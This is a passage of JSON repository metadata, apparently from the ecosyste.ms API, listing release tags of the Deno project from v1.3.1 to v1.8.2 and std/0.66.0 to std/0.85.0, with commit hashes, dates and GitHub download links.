pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/st